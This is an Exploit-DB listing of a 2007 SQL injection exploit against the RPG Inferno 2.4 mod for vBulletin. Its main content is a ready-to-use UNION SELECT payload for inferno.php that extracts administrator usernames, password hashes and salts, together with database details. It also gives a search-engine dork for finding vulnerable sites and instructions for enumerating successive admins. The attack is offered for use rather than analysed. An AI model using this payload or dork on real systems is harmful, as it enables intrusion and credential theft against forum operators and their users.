vBulletin Mod RPG Inferno 2.4 - 'inferno.php' SQL Injection

EDB-ID:

4166

CVE:

2007-3687

EDB Verified:

Author:

t0pP8uZz

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-07-10

Vulnerable App:

--==+================================================================================+==--
--==+                   RPG Inferno v2.4 SQL Injection Vulnerability                 +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://infernotechnologies.net/
DORK: intext:"RPG Inferno is not available to guests" or intext:"Battle Ground Â· Clans Â· Store Â· Jobs Â· Auction Â· Spells Shop Â· Statistics Â· Member List"


DESCRIPTION: SQL Injection in ID of inferno.php a mod for vBulletin, able to retrieve admin hash/salt.

EXPLOIT: 
http://site.com/forum/inferno.php?do=ScanMember&id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,user(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(username,0x3a,password,0x3a,salt),31,@@version,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/from/**/user/**/where/**/usergroupid=6/**/limit/**/0,1/*

NOTE: You'll need to be logged into the forum to access inferno.php. Increment the
limit to get the next admin (ie: [limit 0,1] [limit 1,1] [limit 2,1] etc).


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+                   RPG Inferno v2.4 SQL Injection Vulnerability                 +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-10]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services